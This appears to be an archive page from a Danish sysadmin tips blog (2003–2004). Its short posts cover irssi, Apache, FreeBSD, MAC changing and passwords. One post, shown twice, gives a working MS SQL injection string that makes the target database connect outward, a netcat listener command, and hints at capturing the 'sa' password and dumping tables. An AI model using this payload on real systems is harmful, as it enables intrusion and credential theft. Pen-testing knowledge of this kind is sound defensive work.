UNI-FIX Computer

loggin in irssi

Udgivet den februar 8, 2004 af Valdimirr

If you dont want to read the /help to find out how to log your channels and personal chats in irssi just use
/set autolog on

Vladimirr.dk

Udgivet i Uncategorized | Skriv en kommentar

How to move channels in irssi

Udgivet den januar 19, 2004 af Valdimirr

/windows move X
X is the number you want to move the current channel to.

Vladimirr.dk

Udgivet i IRC, Knowledge Base, Old Base | Skriv en kommentar

Enabling directory indexes in Apache (2)

Udgivet den januar 12, 2004 af mike

The default setting should be something like:

<Directory />
    Options FollowSymLinks
    AllowOverride All
</Directory>


Just add indexes:

<Directory />
    Options FollowSymLinks indexes
    AllowOverride All
</Directory>

Udgivet i Apache, FreeBSD, Knowledge Base, Lamp, Linux, Old Base | Skriv en kommentar

Strong passwords

Udgivet den januar 7, 2004 af mike

1. Pick a sentence that has meaning for you and that you will remember.
	i.e. I work at cox today.
2. All consonants (or all vowels) become UPPERCASE characters.
3. All vowels (or all consonants as it is the opposite of rule 2) become
lower case characters.
4. Words like to and for become numbers.
5. Words like at and "and" become symbols (@ and &)
6. Add some character to the end like ! or #

now my password is iW@C2day!

Udgivet i Knowledge Base, Old Base, Security | Skriv en kommentar

Change MAC Adress on Windows 2000

Udgivet den januar 7, 2004 af mike

Check out this new tool for changing MAC addresses on Windows 2000 & XP, 
for almost all Network Adapters out there!  It doesn't change the hardware 
MAC address, just the MAC address that got interpreted by the network 
adapter drivers and Windows.

You can download it at: 
http://www.klcconsulting.net/smac

*** Note: "00-00-00-00-00-00" is a NOT a valid MAC address for testing so 
it will not work.  Try a MAC address that's couple numbers off from your 
TRUE MAC address for testing***

Udgivet i Knowledge Base, Networking, Windows, Workstation | Skriv en kommentar

Pen test, SQL Injection

Udgivet den januar 7, 2004 af mike

Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

Udgivet i Knowledge Base, Old Base, SQL | Skriv en kommentar

Pen test, SQL Injection

Udgivet den januar 7, 2004 af Brian Lund Klint

Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

Udgivet i Exploits, Knowledge Base, Security | Skriv en kommentar

Secure include($_REQUEST[‘page’])

Udgivet den januar 5, 2004 af mike

<?
    $allowed=explode(' ','forside profil produkter sikkerhed service kontakt');

    if (in_array($_REQUEST['p'],$allowed))
    {
        include($_REQUEST['p'].'.inc');
    }
    else
    {
        include($allowed[0].'.inc');
    }
?>


include file.inc as contained in $_REQUEST['p'] (query variable) if `file` are liste in the $allowed array.

Udgivet i Apache, Knowledge Base, Old Base, Security | Skriv en kommentar

Mount iso file under freebsd

Udgivet den december 26, 2003 af mike

pinable# mdconfig -a -t vnode -f WarLinux-0.5cd.iso -u 0
pinable# mount -t cd9660 /dev/md0 /mnt

Udgivet i FreeBSD, Knowledge Base, Old Base | Skriv en kommentar

Change NIC MAC in FreeBSD

Udgivet den december 21, 2003 af Brian Lund Klint

ifconfig xl0 ether 00:11:22:33:44:55

Udgivet i FreeBSD, Knowledge Base | Skriv en kommentar

loggin in irssi

How to move channels in irssi

Enabling directory indexes in Apache (2)

Strong passwords

Change MAC Adress on Windows 2000

Pen test, SQL Injection

Pen test, SQL Injection

Secure include($_REQUEST[‘page’])

Mount iso file under freebsd

Change NIC MAC in FreeBSD

Seneste indlæg

Arkiver

Kategorier

Meta